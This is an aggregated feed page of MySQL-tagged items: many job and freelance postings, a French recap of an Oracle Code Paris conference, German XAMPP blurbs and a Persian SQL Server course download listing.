Design and implement automated deployment strategies that scale with the business. Knowledge in relational and NoSQL databases like MySQL, SQLServer, Oracle and...
From JPMorgan Chase - Wed, 20 Jun 2018 10:43:27 GMT - View all Seattle, WA jobs
          Oracle Code : suite du résumé      Cache   Translate Page   Web Page Cache   

La journée Oracle Code, du 3 juillet dernier, a été l’occasion de voir les logiciels et plateformes Oracle en oeuvre et les dernières nouveautés et tendances. Parmi les sessions intéressantes, nous pouvions voir MySQL Document Store. MySQL gère le stockage orienté document avec un soupçon de SGBDR, de NoSQL et de JSON Document. JSON Document est un objet avec une structure de données. Cette structure est implicite dans le document. Il est compact et standardisé. Ce format est supporté par défaut dans MySQL (via ECMA-404). De nombreuses fonctions lui sont rattachées : recherches ou encore agrégations, avec la possibilité de faire des requêtes. MySQL 8 rajoute d’ailleurs quelques fonctions à la partie JSON. 

La partie Document Store est un élément non négligeable dans la base de données. Il ne possède pas de schéma (schemaless), il possède une structure de données flexible et bien entendu, il est JSON « ready ». Et on peut lui appliquer le principe CRUD : création, lecture, mise à jour et suppression. MySQL veut concilier, comme d’autres bases, le monde SQL et NoSQL. Pour ce faire, on dispose, sur la partie Document Store de plusieurs composants pour les développeurs : MySQL X Plugin, X Protocole, cluster InnoDB, de nouvelles API, d’un shell MySQL et des connecteurs. Si on résume, MySQL supporte donc le modèle hybride relationnel et NoSQL avec différents moteurs et de modèles de stockages.

Comme vous le savez, Oracle possède son offre de Cloud public : Oracle Cloud. Une des sessions permettait de voir comment utiliser Terraform, et donc l’infrastructure as code dans ce contexte et avec l’idée de DevOps (il faut bien le caser quelque part -:)). Terraform est un outil d’infra as code avec des versions open source et entreprises. La session a permis d’installer l’outil dans le cloud infrastructure d’Oracle puis de voir comment on crée son code d’infrastructures. Mieux vaut regarder les sessions en replay. 

Autre session qui nous a bien intéressé : the path to pair programment in Che with Atom Teletype. Le speaker rappelle quelques fondamentaux sur Eclipse Che : il s’agit d’une version de l’IDE avec une interface web, des espaces de travail dans des conteneurs eux-mêmes pouvant s’exécuter avec un langage serveur tel que Eclipse JDT. L’outil supporte LSP, Language Server Protocol que l’on retrouve aussi dans Visual Studio. La partie co-édition du code a été la partie centrale de la session.

L’idée est de faire de l’édition de projets / codes à la Google Docs. Il s’agit de faire collaborer les développeurs pour faire du mentorat de code, des revues de code ou de l’édition commune. Atome Teletype est une extension aux éditeurs Atom pour faire du pair programmation et de l’édition concurrente en direct. On dispose de plusieurs librairies : teletype-client, teletype-server et teletype-crdt avec une partie communication basée sur CRDT (conflit-free replicated data type) et WebRTC. Typiquement, avec Teletype, on dispose d’un portail host et x invités. Il s’occupe de partager la session de programmation et partage les fichiers du portail host. Si vous ne connaissez, jetez-y un coup d’oeil. 

Java a été un thème central de la journée. Parmi les sessions, on pouvait voir « boîte à outils mémoire de la JVM ». Ah la fameuse gestion mémoire, on pourrait en écrire des livres dessus. Il existe des mécanismes pour mesurer les performances, définir la taille mémoire. Par exemple, vous pouvez activer les logs du ramasse-miettes. Combien de développeurs Java y pensent ? En JRE 8, on peut utiliser le Parallèle GC. jVisualVM est un autre outil pour visualiser la mémoire de la JVM. Vous pouvez regarder du côté de GCViewer, les logs (pensez aux logs, je l’ai peut être dit plus haut). Pour éviter un out of memory error (on l’adore toutes et tous ce truc), augmentez la taille de la heap, redémarrer de temps en temps la JVM (ben si, pour la purger et la remettre en état). En tout cas, une session que nous vous recommandons !

Terminons par la session : accelerated Oracle JET - Visual JavaScript / HTML5 Cloud Development. Le développement web c’est un peu bord… la jungle : backbone, jQuery, metteur, Angular, React, etc. Oracle JET est un toolkit open source orienté entreprise pour vous aider à développer en JS, HTML5 et REST. Il supporte de nombreuses librairies open source comme Knockout.js, jQuery, Hammer, RequireJS. Et Oracle a introduit ses propres librairies : composants UI, modèles, internationalisation, responsive, etc. L’outil peut donc servir à développer des applications mobiles. L’idée de base est de proposer un développement visuel : approche low code, utiliser les technologies les plus récentes, focus sur les applications métiers. Bien entendu, on peut manipuler directement le code, ajouter la logique que l’on souhaite, étendre la plateforme (via des composants UI ou des librairies JS). 

Découvrez l’ensemble des sessions d’Oracle Code : https://developer.oracle.com/code/paris-june-2018

François Tonic

Catégorie actualité: 
Image actualité AMP: 

          Software Developer - SkipTheDishes - Saskatoon, SK      Cache   Translate Page   Web Page Cache   
Experience with Java 8, Python, React or MySQL is an asset. Apply your understanding of software architecture, and cutting-edge tools and technology to maintain...
From SkipTheDishes - Sat, 23 Jun 2018 06:14:46 GMT - View all Saskatoon, SK jobs
          Need a full stack Developer for a full time job      Cache   Translate Page   Web Page Cache   
I will be reading all the bids for the next 2 days, even if you are the last bid so be comfortable in bidding. Looking to hire a full time developer who has hands on experience with: PHP MySQL (Codeigniter,... (Budget: $250 - $750 USD, Jobs: MySQL, PHP, Software Development, Web Development, Website Design)
          Project of Datatables      Cache   Translate Page   Web Page Cache   
An ongoing project needs developers with experiences of Datatables. 5-8 working hours per day is expected. If you or your team also has experience on the theme of Metronic, it might assist. Please provide... (Budget: $8 - $15 CAD, Jobs: Bootstrap, jQuery / Prototype, MySQL, PHP)
          Looking for someone proficient in QB Customization, QB API's and Script Developement      Cache   Translate Page   Web Page Cache   
Looking for a backend developer to help me with various projects. Needs to be an expert in Quickbooks customization & QB API's Needs to be familiar with fulfillment software (3PL Central, covalentworks,... (Budget: $30 - $250 USD, Jobs: Accounting, ASP, MySQL, PHP, Software Architecture)
          XAMPP Portable      Cache   Translate Page   Web Page Cache   
Mit „XAMPP Portable“ richten Sie einen Webserver ein. Das Programmpaket enthält verschiedene Komponenten wie Apache, MySQL, PHP, Perl, OpenSSL, phpMyAdmin, Webalizer, NetWare, FileZilla FTP-Server, Mercury Mail Transport System und SQLite. Haben Sie alle fertig installiert, steht eine komplette Entwicklungs- und Testumgebung mit Datenbanken und Programmiersprachen zur Verfügung. Praktisch: Diese portable Programmversion von „XAMPP“ lässt sich ohne Installation auf jedem PC oder Notebook starten, beispielsweise direkt von einem USB-Stick.
          XAMPP (Mac)      Cache   Translate Page   Web Page Cache   
Mit „XAMPP“ richten Sie einen Webserver ein. Das Programmpaket enthält verschiedene Komponenten wie Apache, MySQL, PHP, Perl, OpenSSL, phpMyAdmin, Webalizer, NetWare, FileZilla FTP-Server, Mercury Mail Transport System und SQLite. Haben Sie alle fertig installiert, steht Ihnen eine komplette Entwicklungs- und Testumgebung mit Datenbanken und Programmiersprachen zur Verfügung.
          XAMPP      Cache   Translate Page   Web Page Cache   
Mit „XAMPP“ richten Sie einen Webserver ein. Das Programmpaket enthält verschiedene Komponenten wie Apache, MySQL, PHP, Perl, OpenSSL, phpMyAdmin, Webalizer, NetWare, FileZilla FTP-Server, Mercury Mail Transport System und SQLite. Haben Sie alle fertig installiert, steht eine komplette Entwicklungs- und Testumgebung mit Datenbanken und Programmiersprachen zur Verfügung.
          today's howtos      Cache   Translate Page   Web Page Cache   

read more


          Java JEE Developer      Cache   Translate Page   Web Page Cache   
VA-Reston, Java Developer Reston, VA MUST: Experienced Mid level Java Developer 5 years of experience in software/web services design or related area Knowledge of Java, Java services and frameworks such as Spring, JSP (Java Server Pages), and JSF (Java Server Faces) Should have knowledge of Web Services; SOAP, XML, J2EE (Java Enterprise Edition) Some knowledge of MySQL and Linux and knowledge of web language
          Facebook message system      Cache   Translate Page   Web Page Cache   
We want a connection with Facebook pages messages. 1. Login with facebook login 2. select facebook page for the messages 3. Read the messages from the page (with a script) 4. Answer the messages I want... (Budget: €250 - €750 EUR, Jobs: AJAX, HTML, Javascript, MySQL, PHP)
          Migration C# code to Spring      Cache   Translate Page   Web Page Cache   
I have a C# project - socket programming. I would like this project to get migrated to Spring 5 with proper documentation. This is the project which I would like to migrate. https://github.com/cyberinferno/LoginAgent (Budget: ₹1000 - ₹1500 INR, Jobs: C# Programming, Java, MySQL)
          Need exp CI Developer urgently      Cache   Translate Page   Web Page Cache   
Need exp CI Developer urgently (Budget: ₹100 - ₹400 INR, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Frontend Developer - Mayfair - Evolution Recruitment Solutions - Mayfair, SK      Cache   Translate Page   Web Page Cache   
PHP, MySQL, any backend frameworks. Exposure to design tools (Photoshop, XD and other Adobe products). Frontend Developer - Mayfair - £40-£55k DOE....
From Evolution Recruitment Solutions - Thu, 17 May 2018 21:11:30 GMT - View all Mayfair, SK jobs
          Analyst programmer web - Maisons Laprise - Montmagny, QC      Cache   Translate Page   Web Page Cache   
SQL, PHP, mySQL, Système CMS Drupal, JQuery, configuration de serveurs Linux, développement mobile (Android, iOS), expérience en développement de site...
From Maisons Laprise - Fri, 06 Apr 2018 09:23:46 GMT - View all Montmagny, QC jobs
          Programmeur - Maisons Laprise - Montmagny, QC      Cache   Translate Page   Web Page Cache   
SQL, PHP, mySQL, Système CMS Drupal, JQuery, configuration de serveurs Linux, développement mobile (Android, iOS), expérience en développement de site...
From Maisons Laprise - Thu, 05 Apr 2018 07:36:23 GMT - View all Montmagny, QC jobs
          Software Developer (PHP) at Supermart Express Service      Cache   Translate Page   Web Page Cache   
Supermart.ng, Nigeria's leading online supermarket. If you desire to work in a fast paced environment, and experience rapid personal and career growth while making a tremendous impact in society, then this might be the company for you. We offer a truly entrepreneurial experience in a fast paced, yet structured environment, work within a proudly Nigerian company built by young, talented and dynamic entrepreneurs. We operate a structured yet fun and easy-going work environment and also a management trainee and in-house entrepreneurial mentor-ship program.Job Description Design, build, and maintain efficient, reusable, and reliable PHP code Integration of data storage solutions (MySQL, MongoDB) Building Restful APIs. Identify bottlenecks and bugs, and devise solutions to these problems Help maintain code quality, organization and automatization Writing automated test using codeception. Solving complex performance problems and architectural challenges. Qualifications Degree and/or relevant certifications One to two years experience with PHP, Laravel Framework.
          Patient database Management System      Cache   Translate Page   Web Page Cache   
We have already have patient database management system, where are some bugs , we want to resolve them as you will show interest in our project i will clear the all the project information. (Budget: $30 - $250 USD, Jobs: .NET, ASP, Database Programming, MySQL)
          Word Press Developer Free Lancer Needed       Cache   Translate Page   Web Page Cache   
Wordpress Plugins Developer wanted, has developed a few plugins before. PHP and MySQL is a must. Code with wordpress coding standard. Project for SME web site. Thanks. (Budget: $10 - $30 USD, Jobs: MySQL, PHP, WordPress)
          Sr Software Developer (Mobile App - Reactive) (7491258) - emergiTEL Inc. - Burnaby, BC      Cache   Translate Page   Web Page Cache   
.net core/Java for middleware, MS SQL/MySQL RDS. Leads design, development and documentation of a complex and comprehensive product suite.... $80,000 - $100,000 a year
From EmergiTel Inc. - Wed, 20 Jun 2018 06:49:20 GMT - View all Burnaby, BC jobs
          Software Developer Analyst - Evo Car Share Mobile App Developer - British Columbia Automobile Association - Burnaby, BC      Cache   Translate Page   Web Page Cache   
.net core/Java for middleware, MS SQL/MySQL RDS. Aon Hewitt has announced BCAA as a 2018 Canadian Gold Level Best Employer....
From British Columbia Automobile Association - Sun, 25 Mar 2018 05:46:19 GMT - View all Burnaby, BC jobs
          Senior Software Developer Analyst Evo Car Share Mobile App Developer - British Columbia Automobile Association - Burnaby, BC      Cache   Translate Page   Web Page Cache   
.net core/Java for middleware, MS SQL/MySQL RDS. Aon Hewitt has announced BCAA as a 2018 Canadian Gold Level Best Employer....
From British Columbia Automobile Association - Sun, 25 Mar 2018 05:46:18 GMT - View all Burnaby, BC jobs
          Freelancer.com: Change RESTful example from session/Criteria to using EntityManager and NamedQuery      Cache   Translate Page   Web Page Cache   
Hi, this is for educational purpose, Referring to the following RESTful webservcie example project: https://github.com/mustafamym/Spring-Boot-REST-JPA-Hibernate-MySQL-Example Currently the project is using Session and Criteria to manage sql queries... (Budget: $10 - $20 AUD, Jobs: J2EE, Java, Linux, MySQL, node.js)
          Software Development Manager      Cache   Translate Page   Web Page Cache   
e-Merge IT Recruitment - Johannesburg, Gauteng - to work within a forward thinking, innovative and fast growing environment. If you are a Software Development Manager with skills in PHP, MySQL...
          [آموزش] دانلود Packt SQL Server 2017 Express Basics – آموزش مقدماتی اس کیو ال سرور ۲۰۱۷ اکسپرس      Cache   Translate Page   Web Page Cache   

دانلود Packt SQL Server 2017 Express Basics - آموزش مقدماتی اس کیو ال سرور 2017 اکسپرس#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000

Microsoft SQL Server یک نرم‌افزار مدیریت پایگاه داده رابطه‌ای است که توسط شرکت مایکروسافت توسعه داده می‌شود. از جمله ویژگی‌های این سامانه، می‌توان به ساخت و مدیریت بانک اطلاعاتی رابطه‌ای، پشتیبانی از ACID، پشتیبانی از Referential integrity، قابلیت‌های انتقال پایگاه و بسیاری از قابلیت‌های دیگر داده اشاره کرد. این نرم افزار دارای ویرایش‌های متنوع و متناسب با محیط‌های کاری مختلف است. یکی از قابلیت‌های نرم افزار، سازگاری با Platform های مختلف و مخصوصاً Microsoft Azure است. با استفاده از این ویژگی سرعت و دسترسی به اطلاعات قبلی میسر شده و مدیران IT می‌توانند از امکانات شبکه ابری Microsoft Azure ...


http://p30download.com/80800

مطالب مرتبط:



دسته بندی: دانلود » آموزش » برنامه نویسی و طراحی وب
برچسب ها: , , , , , , , , , , , , ,
لینک های مفید: خرید کارت شارژ, شارژ مستقیم, پرداخت قبض, خرید آنتی ویروس, خرید لایسنس آنتی ویروس, تبلیغات در اینترنت, تبلیغات اینترنتی
© حق مطلب و تصویر برای پی سی دانلود محفوظ است همین حالا مشترک این پایگاه شوید!
لینک دانلود: http://p30download.com/fa/entry/80800


          Senior Python/Django Full Stack Developer      Cache   Translate Page   Web Page Cache   

England, United Kingdom (required on-site)

About WiseAlpha

WiseAlpha is a Fintech that is shaking up the banking and fixed income industry. Until now, the corporate loan and bond market has remained largely untransformed by technological innovation and access has remained out of the hands of everyday investors. WiseAlpha is leading the way in opening this multi-trillion asset class to the masses. Our philosophy is one of market liberalisation and freedom of access to the best investments. We are looking for similarly minded people to join the firm as we expand. And, not that we like to brag, but we also won the award for Best Investments Provider at the British Bank Awards 2018.


About you

We’re looking for a top-class Python/Django developer to help us build and improve our platform. We’re a small team so we need lateral thinkers and keen all-rounders who are happy to work on all parts of the system. Our team takes pride in quality work and delivering on tight schedules whilst striving to produce scalable and maintainable code.


What will I be doing?

You’ll be working closely with the CTO and a small team, building new products and services as well as streamlining the existing system. Your voice matters! As we’re such a small team you’ll be able to help shape all parts of the development processes. Our goal is to keep lean and agile whilst producing high-quality software.


Skills and experience

We’d like you to have had exposure to a wide range of web technologies. Ideally, you’ll have worked with the following:

  • Django

  • Python

  • Django Rest Framework

  • React, Angular or Backbone

  • Jquery

  • Javascript

  • AWS

  • Postgress/MySQL

  • HTML5

  • CSS 3

  • Responsive design

  • Git


Nice to have:

  • Test-driven development

  • Typescript

  • Redis

  • Celery


Extra creds for:

  • Having a numerate based degree (Computer Science/Maths/Physics)

  • Having worked in a financial institution

  • Having built or managed an iOS/Android app rollout

  • Having managed a coding team

  • Experience with Continuous Integration/Continuous Delivery

  • Good at humaning



          (USA-WA-Seattle) Senior SQL Developer      Cache   Translate Page   Web Page Cache   
Senior SQL Developer Senior SQL Developer - Skills Required - SQL Server, T-SQL, SSIS SSRS & SSAS, SQL Development, Data Warehouse design & development, Designing and developing database in MS SQL Server, Stored Procedures, Development knowledge in SQL Server 2008-2016, Powershell Scripting, MY SQL If you are a Senior SQL Developer with experience, please read on! Based in beautiful Seattle we are a luxurious and innovative company that specializes in tourism. Due to growth and demand for our services, we are in need of hiring for a Senior SQL Developer that possesses strong experience in database development, TSQL, and MS SQL or a comparable technology. We specialize in luxury leisure travel with almost 20,000 advisers and 1700 partnerships with top hotels, cruise lines, tour operators, and more. If you are interested in joining a superior travel company that pushes the envelope in tourism and definitely cares about providing a great working environment for its employees, then apply immediately. **What You Will Be Doing** This role actively participates as a Senior SQL Developer contributing to SQL Development and has experience in SQL Server 2008 and above. You will work on data warehouse design and development entity relationship model design, good data typing practices, index management, data management, and data security. Expert level knowledge of TSQL, performance tuning, Query Plans, and Query Plan optimization for TSQL. Be able to understand the development of BI/DW architectures. **What You Need for this Position** Advanced experience in developing database in MS SQL Server utilizing stored procedures, functions, triggers, queries etc or alternately 5+ years with an equivalent product such as DB2, Oracle, or MySQL Must possess knowledge of how to tune and optimize SQL Server database and solutions including partitioning, indexing, de-normalization etc. Need to have working knowledge of Query Execution Plan and Execution Statistics Expert in creating tables, indexes, keys, constraints and triggers to facilitate efficient data manipulation, integration and consistency. Excellent understanding of Entity-Relationship/Multidimensional Data Modeling (Star schema, Snowflake schema), Data Warehouse Life Cycle and SQL Server Analysis Services (SSAS). Knowledge of newer database architectures, tools and best practices for SQL Server including ORM mapping tools, including but not limited to NoSQL, BigData, Analytics etc. **What's In It for You** -Medical -PTO -Vision -401k -Dental -Life -110-130k DOE So, if you are a Senior SQL Developer with experience, please apply today! --- You can also email me directly at lindsey.palma@cybercoders.com --- Find me on LinkedIn - www.linkedin.com/in/lindseypalma Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Senior SQL Developer* *WA-Seattle* *LP5-1466910*
          (USA-CA-San Francisco) Principal Product Manager      Cache   Translate Page   Web Page Cache   
Principal Product Manager (Payfac) Principal Product Manager (Payfac) - Skills Required - PayFac, Mobile Products, Web Products, Product Management, Product Development, Product Design, Product Research & Strategy, Agile, Python, MySQL If you are a Principal Product Manager (Payfac) with experience, please read on! **What You Will Be Doing** Lead the roadmapping, prioritization, development, and execution of major payment initiatives. Act as a GM for payment products Own company-level OKRs for that initiative. Work cross-functionally with Engineering, Design, Analytics, Marketing, and other product teams to create experiences users love. Use qualitative customer research and data analysis to communicate product vision to senior management and various stakeholders. **What You Need for this Position** Degree in computer science, engineering or related field 8+ years of experience building, launching and iterating on product initiatives that users love Previous experience building payment products (Payfac specifically) Strong technical architectural understanding of mobile and web products Proven ability to lead teams and work cross-functionally in a highly collaborative environment Excellent data analysis skills Excellent written and verbal communication skills with the ability to champion products across the organization Knowledge of product management best-practices around development (e.g., agile), roadmapping/vision (e.g., user-research, & strategic thinking), and coordination/communication with key internal stakeholders (e.g., design & marketing) **What's In It for You** HIGHLY competitive comp package and an amazing team! So, if you are a Principal Product Manager (Payfac) with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Principal Product Manager* *CA-San Francisco* *EU1-1467001*
          (USA-NY-New York City) Mid Level Ruby on Rails Developer      Cache   Translate Page   Web Page Cache   
Mid Level Ruby on Rails Developer Mid Level Ruby on Rails Developer - Skills Required - Ruby On Rails, Client side framework like Backbone or Angular, MVC, RESTful JSON API's and microservice methodologies, MySQL, Mongodb and Redis datastore/caching layers, Testing frameworks on both sides of the stack If you are a Full Stack Developer with experience, please read on! Our company harnesses the power of celebrity, technology, and media to raise awareness and funds for some of the world's toughest challenges. With a mission to complement traditional fundraising models and help charities transition from analog to digital, we have raised well over $200M for charity since inception...and were just getting started. **What You Will Be Doing** As a fullstack developer, your primary responsibilities will be maintaining and adding features to the current rails production apps, and developing the apps of the future. You will work closely with a stellar team of engineers, designers, and product people in a casual office atmosphere **What You Need for this Position** Requirements and Qualifications: BS/MS degree equivalent or 3+ years of programming experience in production Experience working with various Rails/Ruby versioning (3.2+ and Ruby 1.9 +) Equally comfortable in a client side framework like Backbone or Angular MVC, writing writing clean, loosely coupled code. Loves RESTful JSON APIs and microservice methodologies Experience working with MySQL, Mongodb and Redis datastore/caching layers. Experience with testing frameworks on both sides of the stack Bonus Skills: Experience with Java and Play framework Experience handling Rackspace, AWS and Heroku infrastructure **What's In It for You** Competitive salaries Potential Equity Paid time off Medical, dental, & vision insurance Life Insurance and Disability Benefits 401K Top of line Macbooks So, if you are a Full Stack Developer - Java w/play framework with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Mid Level Ruby on Rails Developer* *NY-New York City* *DA3-1466844*
          (USA-MA-Boston) Magento Developer -      Cache   Translate Page   Web Page Cache   
Magento Developer - (Magento/PHP7) Magento Developer - (Magento/PHP7) - Skills Required - Magento, PHP7, MySQL, Laravel If you are a Magento Developer looking for a new job opportunity, read on! We are an ecommerce company based in Somerville, and we have one of the sharpest teams around! Currently we are looking for a Software Engineer who has worked with the most recent versions of Magento and PHP, while also working with Laravel and MySQL. Apply now! **What You Need for this Position** At Least 3 Years of experience and knowledge of: - Magento - PHP7 - MySQL - Laravel So, if you are a Magento Developer with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Magento Developer -* *MA-Boston* *MM5-1466750*
          (USA-IL-Naperville) Software Engineer -React.JS, RoR, MySQL-      Cache   Translate Page   Web Page Cache   
Software Engineer -React.JS, RoR, MySQL- (125K - 140K) Software Engineer -React.JS, RoR, MySQL- (125K - 140K) - Skills Required - Ruby On Rails, MySQL, SQL, Github, Bit Bucket, Familiar with AWS, React.JS, Angular.js, Amber.JS Job title: Full-Stack Software Engineer Job Location: Naperville, IL Required Skills: Ruby On Rails, React.JS (Preferred), MySQL, SQL, Angular.JS, or Amber.JS Salary: 125K - 140K Located in beautiful Libertyville, IL, we are the leading Sr. level performance capital level management company in the state of Illinois. We encourage and emphasize collaboration and innovation in all of our employees. We boast flexibility to the smartest, brightest, and driven individual. Due to growth and ongoing and future projects, we are looking to hire for a talented Full-Stack Software Engineer to join our team. This person should strong experience with Ruby On Rails, SQL, MySQL, and (React.JS (Preferred), Angular.JS, or Amber.JS). We would like to see this candidate also have Github, Bit bucket, and be familiar with AWS. If this sounds like you, please apply for this amazing opportunity! **What You Need for this Position** Required Skills: - Ruby On Rails - React.JS (Preferred), Angular.JS, or Amber.JS - MySQL - SQL Nice to have skills: - Github - Bit Bucket - Familiar with AWS **What You Will Be Doing** - Be responsible for information on the detailed technical design and development of applications using emerging and existing technology platforms. - Codes and design application programs - Performs testing for developed applications - Conducts analyses of client needs and goals for the implementation and development of application systems. - Analyzes, review, and modifies programming systems, including testing, coding, debugging, and installing for a large-scale system. - Ensures the functioning efficiency of current application systems **What's In It for You** We are a fantastic company that believes in taking care of its employees. If hired, you will be rewarded with an offer that will include: - Solid competitive pay (125K - 140K) - Bonus incentives - Amazing work life balance - Medical, dental, vision, Rx, 401k, FSAs, life insurance, disability insurance - Fun, laid-back environment, casual dress code - 401K - PTO - Incredible job stability - A great and fun working environment - & other cool perks! **Top Reasons to Work with Us** - Excellent Work/Life Balance. - Join a Hyper-growth company with the opportunity to shape the strategic direction of the company. - We work with cutting-edge technologies that keep our employees intellectually stimulated and professionally marketable. - We operate in a Class A office environment and pride ourselves on cultivating a hospitable work space for everyone to prosper. - In-addition to retaining employees by means of a hospitable, intellectually stimulating workplace we believe in compensating our people with aggressive compensation packages. - We help our customers make the best smart devices in the world by automating and digitizing testing. - We get things done and for us there is no such thing as mission impossible. - Our clients are the world's biggest tech companies. So, if you are a Software Engineer - RoR, React.JS, SQL, MySQL - (125K - 140K) with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Software Engineer -React.JS, RoR, MySQL-* *IL-Naperville* *ND2-1466878*
          (USA-CA-San Francisco) Infrastructure Engineer -      Cache   Translate Page   Web Page Cache   
Infrastructure Engineer - Infrastructure Engineer - - Skills Required - LAN/WAN, BGP, Data Center, Juniper, ITIL, OSPF, Citrix, MySQL, VPN If you are a Infrastructure Engineer with experience, please read on! **Top Reasons to Work with Us** Exciting Startup **What You Will Be Doing** Sr. Systems / Infrastructure Engineer to join the super computing group. The high performance computing group is responsible for engineering and maintaining large scale environments specifically for solving large scale data science and artificial intelligence problems. Architect, install, configure and administer server systems (Ubuntu, Centos RHEL, Windows Server, Citrix) Designing hardware requirements and selecting and procuring appropriate hardware Architect, install, configure and administer storage area networks (SAN) Architect network architecture and install, configure and administer common networking components such as firewalls, switches, routers, VPN, KVM and security appliances Develop and administer security architecture, two-factor authentication, SAML, auditing and intrusion detection systems Troubleshoot server, storage and networking problems **What You Need for this Position** 4+ years of real world industry experience Experience in maintaining Ubuntu, Centos, Redhat and Windows Servers Knowledge of designing and implementing data center and server architectures and operations (Dell and HP) Design and Maintain complex LAN / WAN (BGP, ISIS, OSPF, MPLS) Deep knowledge of vendor networking products (Cisco, Dell, Brocade, Juniper, SonicWall) Deep knowledge of designing and implementing virtual infrastructures (HyperV, VMware) Experience with deploying VDI (Citrix XenApp, XenDesktop, NetScaler) Knowledge of administering common RDBMS (MSSQL, MySQL, Etc.) Experience in ITIL CMDB practices Knowledge of load balancing (Juniper, Peplink) Deep knowledge of enterprise storage area networks (SAN), network attached storage (NAS), data center storage, failover, backup, disaster recovery Deep knowledge of AWS integration with on premise infrastructure / systems Knowledge of infrastructure automation through scripting (powershell, python, shell) Proven project management skills Proven team leadership skills Strong problem solving and troubleshooting skills **What's In It for You** Great Salary and Benefits So, if you are a Infrastructure Engineer with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Infrastructure Engineer -* *CA-San Francisco* *RC4-1467004*
          (USA-CA-San Francisco) Data Engineer Spark -      Cache   Translate Page   Web Page Cache   
Data Engineer Spark - Data Engineer Spark - - Skills Required - Hadoop, SPARK, Linux, Engineer If you are a Data Engineer Spark with experience, please read on! **Top Reasons to Work with Us** Highly reputable **What You Will Be Doing** Develop custom ETL applications using Spark in Python/Java that follow a standard architecture. Success will be defined by the ability to meet requirements/acceptance criteria, delivery on-time, number of defects, and clear documentation. Perform functional testing, end-to-end testing, performance testing, and UAT of these applications and code written by other members of the team. Proper documentation of the test cases used during QA will be important for success. Other important responsibilities include clear communication with team members as well as timely and thorough code reviews. As you grow in the role, you will have the opportunity to contribute to designing of new applications, setting/changing standards and architecture, and deciding on usage of new technologies. **What You Need for this Position** Linux - common working knowledge, including navigating through the file system and simple bash scripting Hadoop - common working knowledge, including basic idea behind HDFS and map reduce, and hadoop fs commands. Spark - how to work with RDDs and Data Frames (with emphasis on data frames) to query and perform data manipulation. Python/Java - Python would be ideal but a solid knowledge of Java is also acceptable. SQL Source Control Management Tool - We use BitBucket Experience ---------- Worked/developed in a Linux or Unix environment. Worked in AWS (particularly EMR). Has real hands-on experience developing applications or scripts for a Hadoop environment (Cloudera, Hortonworks, MapR, Apache Hadoop). By that, we mean someone who has written significant code for at least one of these Hadoop distributions. Has experience with ANSI SQL relational database (Oracle, SQL, Postgres, MySQL) **What's In It for You** Great Salary and Benefits So, if you are a Data Engineer Spark with experience, please apply today! Applicants must be authorized to work in the U.S. **CyberCoders, Inc is proud to be an Equal Opportunity Employer** All qualified applicants will receive consideration for employment without regard to race, color, religion, sex, national origin, disability, protected veteran status, or any other characteristic protected by law. **Your Right to Work** – In compliance with federal law, all persons hired will be required to verify identity and eligibility to work in the United States and to complete the required employment eligibility verification document form upon hire. *Data Engineer Spark -* *CA-San Francisco* *RC4-1466982*
          (USA-AZ-Scottsdale) Senior Database Administrator      Cache   Translate Page   Web Page Cache   
Senior Database Administrator Senior Database Administrator - Skills Required - MSSQL, Couch, MySQL, PostgreSQL, Database sharing and partitioning, Linux, Database backup / restore and recovery models, PHP/Python/Ruby/Java/C/C++/C#/Javascript, AWS DynamoDB / Redshift / Redis, Managing databases in virtual / cloud environments If you are a Senior Database Administrator with experience, please read on! The Senior Database Administrator designs, implements, manages and supports our production and development databases. You will ensure our production databases have minimal downtime and are tuned for optimal performance and response time. You will also be responsible for performing security and maintenance releases. Further, you will work closely with a team of developers to define and evolve our data model, support application development, and data analytics. **What You Will Be Doing** Manage primary and replica databases across multiple data centers Document policies, procedures, and technical standards related to disaster recovery planning and execution Work with engineering and operations teams to define multi-data center replication strategy Essential Database Administration - install, configure, upgrade, back up, and monitor databases Serve as point-of-contact for any defined database questions regarding performance, security, or ongoing maintenance Automate and script DBA tasks Work with application developers and systems engineers to troubleshoot and optimize queries, and performance bottlenecks for current and future implementations Engagement with Linux administration/operations and virtualization engineers Integrate instances with enterprise monitoring and alerting tools Outages and alert response to ensure availability of database and infrastructure Refine processes to improve high performance and high availability Create instrumentation/monitoring solutions to gain insight into existing application and database performance and to understand emerging issues Maintain and create automation and deployment software and tools. **What You Need for this Position** Experience troubleshooting PostgreSQL query performance 4-8 years of experience in MySQL database management and scripting in a professional environment. Recent experience implementing multilayer, high-availability replication topologies Exposure to NoSQL platforms and conceptual 